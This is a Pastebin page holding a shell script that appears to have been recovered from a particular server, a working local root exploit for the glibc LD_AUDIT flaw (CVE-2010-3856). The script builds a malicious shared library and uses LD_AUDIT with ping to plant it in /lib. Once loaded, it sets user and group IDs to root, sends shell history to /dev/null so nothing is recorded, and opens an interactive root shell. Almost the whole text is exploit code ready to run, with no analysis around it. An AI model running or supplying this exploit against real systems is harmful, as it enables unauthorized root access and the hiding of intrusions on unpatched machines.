Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----------------------------------------------------------
- glibc.sh file on 62.152.104.149 aka CVE-2010-3856
- http://packetstormsecurity.org/files/106817/glibc-LD_AUDIT-Privilege-Escalation.html
- -----------------------------------------------------------
- #!/bin/sh
- echo "[+] Setting umask to 0 so we have world writable files."
- umask 0
- echo "[+] Preparing binary payload."
- cat > /tmp/payload.c <<_EOF
- void __attribute__((constructor)) init()
- {
- printf("[+] Cleaning up.\n");
- unlink("/lib/libexploit.so");
- printf("[+] Launching shell.\n");
- setuid(0);
- setgid(0);
- setenv("HISTFILE", "/dev/null", 1);
- execl("/bin/sh", "/bin/sh", "-i", 0);
- }
- _EOF
- gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
- echo "[+] Writing root owned world readable file in /lib"
- LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null
- echo "[+] Filling the lib file with lib contents."
- cat /tmp/exploit > /lib/libexploit.so
- rm /tmp/payload.c /tmp/exploit
- echo "[+] Executing payload."
- LD_AUDIT="libexploit.so" ping
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement